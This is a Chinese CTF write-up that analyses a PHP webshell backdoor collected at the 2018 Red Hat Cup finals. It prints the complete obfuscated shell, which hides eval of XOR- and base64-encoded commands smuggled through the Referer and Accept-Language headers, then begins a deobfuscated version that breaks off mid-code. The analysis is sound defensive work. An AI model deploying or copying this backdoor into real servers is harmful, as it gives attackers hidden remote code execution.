开始前的例行叨叨:
这个后门样本收集于2018红帽杯线下决赛,看到有其他分析收集于自己的服务器,悲剧了(手动笑哭),貌似蓝帽杯也有。
调试了很久,被逼着专门学了半天正则表达式,但感觉写完这篇文章就忘干净了。
马的特殊性就是,靠特别麻烦,让你在现场心态崩溃,调试不出来,而且抓到流量不会打,直接打过去也看不懂结果6666
(手动滑稽)
后门源码
<?php
$s='=0;pw($pwj<$c&&$ipw<$l);$jpw++pw,$i++){$opw.=$pwt{$i}^$k{$j}pw;}}repwpwturn pw$o;}$r=$_SERVEpwR;$pwpwrr=@$r["HpwTTP_REpwpwFE';
$I='m[2]pw[$z]];ipwf(strpopwspw($p,$h)pw===0){$s[$pwpwi]="";$pwppw=$ss($p,3);}if(apwrray_pwkey_existpws($i,$pws)){pw$s[$i].pw=$p;';
$U='$epw=strppwpwos($s[$ipw],$f);ipwfpw($e){pw$k=$pwkpwh.$kf;ob_start();@evpwapwl(@gzuncpwpwompress(@x(@baspwepw64_decpwpwode(';
$d=str_replace('pF','','cpFreapFtepFpF_pFfuncpFtion');
$Q='preg_replapwce(arrapwypwpw("/_/","/-/"),array("pw/"pw,"+"),pwpw$ss($s[pw$i],0pw,$e))),$k)));pw$opw=ob_gepwt_pwcopwpwntents();o';
$O='b_end_clean(pw);$d=bpwase64pw_epwncode(x(gzcompwpress($opw),$pwk));pripwntpw("<$kpw>$d</$k>");@sespwpwspwion_destroy();}}}}';
$y='RERpwpw"];$ra=@$r["HTTP_ACCEPTpwpw_LANGUAGE"];pwifpw(pw$rr&&$ra)pw{$u=parsepw_urlpw($rr);parspwe_str($upw["qpwupwery"],$q);';
$X='$q=pwapwrray_values(pwpw$q);preg_mpwatchpw_alpwl("/([\\w])[pw\\wpw-]+(?:;q=0.(pw[pw\\d]))?,?/pw",$rpwpwa,$m);pwif($q&&$m){@';
$b='sespwsion_stapwrt();$pwspw=&$_SESpwSpwION;$pwss="spwubpwstr";$sl="pwstrtolopwwer";$i=$m[1][0]pwpw.$m[1][1];pw$h=$sl(pwpw$s';
$q='pws(md5($i.$kh)pw,0,3));$fpwpw=$pwsl($ss(md5($i.$kfpw),0pwpw,3));$p="pw";fopwr($zpw=1;$z<count($m[1pwpw]);$pwz++)$p.=$pwq[$';
$W='$kh="d6a6";pw$kf=pw"bc0d";pwfupwnction x($pwt,$pwkpw){$c=spwtrlen($k);$l=pwpwstrlen($t);pwpw$o="pw";for($i=0pw;$i<$l;){fopwr($j';
$j=str_replace('pw','',$W.$s.$y.$X.$b.$q.$I.$U.$Q.$O);
$u=$d('',$j);$u();
?>
经过Debug调试,解混淆
解混淆后的源码
<?php
$kh = "d6a6";
$kf = "bc0d";
function x($t, $k)
{
$c = strlen($k);
$l = strlen($t);
$o = "";
for ($i = 0; $i < $l; ) {
for ($j = 0; ($j < $c && $i < $l); $j++, $i++) {
$o .= $t{$i} ^ $k{$j};
}
}
return $o;
}
$r = $_SERVER;
$rr = @$r["HTTP_REFERER"];
$ra = @$r["HTTP_ACCEPT_LANGUAGE"];
if ($rr && $ra) {
$u = parse_url($rr);
parse_str($u["query"], $q);
$q = array_values($q);
preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/", $ra, $m);
if ($q && $m) {
@session_start();
$s =& $_SESSION;
$ss = "substr";
$sl = "strtolower";
$i = $m[1][0] . $m[1][1];
$h = $sl($ss(md5($i . $kh), 0, 3));
$f = $sl($ss(md5($i . $kf), 0, 3));
$p = "";
for ($z = 1; $z < count($m[1]); $z++)
$p .= $q[$m[2][$z]];
if (strpos($p, $h) === 0) {
$s[$i] = "";
$p = $ss($p, 3);
}
if (array_key_exists($i, $s)) {
$s[$i] .= $p;
$e = strpos($s[$i], $f);
if ($e) {
$k